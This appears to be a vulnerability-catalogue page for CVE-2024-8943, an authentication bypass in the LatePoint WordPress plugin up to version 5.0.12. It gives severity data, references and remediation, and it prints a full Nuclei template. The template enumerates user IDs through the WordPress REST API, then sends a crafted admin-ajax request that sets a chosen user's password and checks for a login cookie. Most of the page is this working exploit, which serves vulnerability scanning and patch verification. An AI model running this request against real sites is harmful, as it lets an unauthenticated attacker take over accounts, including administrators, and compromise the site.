LatePoint <= 5.0.12 - Authentication Bypass
CVE-2024-8943
Verified
Description
LatePoint plugin for WordPress versions up to 5.0.12 contains an authentication bypass caused by insufficient verification of user during booking, letting unauthenticated attackers log in as any existing user if they have user ID access, exploit requires access to user ID, and the 'Use WordPress users as customers' setting enabled.
Severity
Critical
CVSS Score
9.8
Exploit Probability
40%
Affected Product
latepoint
Published Date
February 4, 2026
Template Author
daffainfo
CVE-2024-8943.yaml
id: CVE-2024-8943
info:
name: LatePoint <= 5.0.12 - Authentication Bypass
author: daffainfo
severity: critical
description: |
LatePoint plugin for WordPress versions up to 5.0.12 contains an authentication bypass caused by insufficient verification of user during booking, letting unauthenticated attackers log in as any existing user if they have user ID access, exploit requires access to user ID, and the 'Use WordPress users as customers' setting enabled.
impact: |
Attackers can log in as any existing user, including administrators, potentially leading to full site compromise.
remediation: |
Update to version 5.0.13 or later.
reference:
- https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/LatePoint/latepoint-5012-authentication-bypass
- https://www.wordfence.com/blog/2024/10/7000-wordpress-sites-affected-by-unauthenticated-critical-vulnerabilities-in-latepoint-wordpress-plugin/
- https://nvd.nist.gov/vuln/detail/CVE-2024-8943
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-8943
epss-score: 0.40056
epss-percentile: 0.97393
cwe-id: CWE-287
cpe: cpe:2.3:a:latepoint:latepoint:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 3
vendor: latepoint
product: latepoint
framework: wordpress
tags: cve,cve2024,wp,wordpress,wp-plugin,latepoint,auth-bypass,vkev
variables:
password: "{{rand_base(8)}}"
email: "{{randstr}}@{{rand_base(5)}}.com"
firstname: "{{rand_base(5)}}"
lastname: "{{rand_base(5)}}"
flow: http(1) && http(2)
http:
- method: GET
path:
- "{{BaseURL}}/{{route}}"
attack: clusterbomb
payloads:
route:
- "wp-json/wp/v2/users"
- "?rest_route=/wp/v2/users"
stop-at-first-match: true
matchers:
- type: dsl
dsl:
- 'contains_all(body, "[{\"id", "name\":")'
- 'contains(content_type, "application/json")'
- 'status_code == 200'
condition: and
internal: true
extractors:
- type: json
name: userid
json:
- '.[0].id'
internal: true
- type: json
name: username
json:
- '.[0].name'
internal: true
- raw:
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=latepoint_route_call&route_name=steps__load_step¶ms=current_step_code%3dcustomer%26step_direction%3dnext%26customer%5bid%5d%3d{{userid}}%26customer%5bemail%5d%3d{{email}}%26customer%5bpassword%5d%3d{{password}}%26customer%5bpassword_confirmation%5d%3d{{password}}%26customer%5bfirst_name%5d%3d{{firstname}}%26customer%5blast_name%5d%3d{{lastname}}&layout=none&return_format=json
matchers:
- type: dsl
dsl:
- 'contains(set_cookie, "wordpress_logged_in_")'
- 'contains(body, "\"status\":\"success\"")'
- 'status_code == 200'
condition: and
# digest: 4a0a004730450220528f93eae4798aecd2a81a576b6d596bb236c13eb6af2a157c4421718ff9b3d4022100d3665573419f889e5e86e2580536bd21834cd6d98ff95899264bb33cc4bfe3b9:922c64590222798bb761d5b6d8e729509.8Score
CVSS Metrics
CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVE ID:
cve-2024-8943
CWE ID:
cwe-287
References
https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/LatePoint/latepoint-5012-authentication-bypasshttps://www.wordfence.com/blog/2024/10/7000-wordpress-sites-affected-by-unauthenticated-critical-vulnerabilities-in-latepoint-wordpress-plugin/https://nvd.nist.gov/vuln/detail/CVE-2024-8943
Remediation Steps
Update to version 5.0.13 or later.